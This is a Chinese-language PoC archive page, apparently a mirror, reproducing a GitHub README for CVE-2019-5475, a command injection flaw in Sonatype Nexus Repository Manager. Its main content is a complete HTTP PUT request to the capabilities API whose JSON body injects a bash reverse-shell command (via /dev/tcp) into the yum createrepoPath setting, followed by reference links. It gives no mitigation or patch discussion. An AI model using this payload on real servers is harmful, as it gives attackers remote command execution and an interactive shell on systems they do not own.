支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: d56435262e5a72cef54379f24b1c1e23a0ea9310

来源
https://github.com/jaychouzzk/CVE-2019-5475-Nexus-Repository-Manager-
关联漏洞
标题:Sonatype Nexus Repository Manager 操作系统命令注入漏洞 (CVE-2019-5475)
Description:Sonatype Nexus Repository Manager(NXRM)是美国Sonatype公司的一款Maven仓库管理器。 Sonatype NXRM中存在操作系统命令注入漏洞。攻击者可利用该漏洞执行代码。
介绍
# CVE-2019-5475-Nexus-Repository-Manager-

## Payload

```
PUT /nexus/service/siesta/capabilities/xxxxxxxxx HTTP/1.1
Host: xxxx.xxxx.com
User-Agent: 
Accept: application/json,application/vnd.siesta-error-v1+json,application/vnd.siesta-validation-errors-v1+json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Nexus-UI: true
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 188
Authorization: 
Connection: close
Cookie: 

{"typeId":"yum","enabled":true,"properties":[{"key":"createrepoPath","value":"bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/6666 0>&1 ||"}],"id":"0000058a84203a8f","notes":null}
```

### 参考链接:
```
https://cloud.tencent.com/developer/article/1513172
https://qiita.com/shimizukawasaki/items/12f0b69945498e6d5aa9
https://mp.weixin.qq.com/s/E_BEp-yYKtIYAnQ6JP7fmg
https://github.com/shadowsock5/Poc/blob/3b6be229acce3cbc309a6879969cf29750b14acb/nexes-manager/CVE-2019-5475.py
https://blog.spoock.com/2018/11/25/getshell-bypass-exec/
```
文件快照

 [4.0K]  /data/pocs/d56435262e5a72cef54379f24b1c1e23a0ea9310
└── [1.0K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。